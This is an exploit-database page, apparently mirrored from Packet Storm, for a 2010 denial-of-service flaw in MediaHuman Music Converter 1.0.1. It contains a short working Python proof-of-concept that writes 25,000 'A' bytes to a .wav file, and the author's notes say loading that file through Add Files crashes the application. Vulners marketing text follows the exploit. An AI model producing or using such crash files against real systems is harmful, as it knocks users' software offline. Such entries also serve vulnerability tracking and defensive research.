Lucene search
+L

MediaHuman Music COnverter 1.0.1 Denial Of Service

🗓️ 18 Sep 2010 00:00:00Reported by modpr0beType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

MediaHuman Music Converter 1.0.1 Denial of Service vulnerabilit

Code
`# Exploit Title: MediaHuman Music Converter 1.0.1 .wav and .mp3 Denial of Service  
# Date: September 17, 2010  
# Author: modpr0be  
# Software Link: http://www.mediahuman.com/download.html  
# Version: 1.0.1  
# Tested on: Windows 7  
# CVE :  
  
# How it works?  
# Go to Add Files... --> Choose blah .wav and bang! app crash..  
# Testing on Windows 7 Ultimate..crashed, windows auto report and solution window pop out..  
# works on .wav and .mp3  
  
#!/usr/bin/python  
  
junk = "\x41" * 25000  
  
file = open('blah.wav','w')  
file.write(junk)  
file.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Sep 2010 00:00Current
7.4High risk
Vulners AI Score7.4
22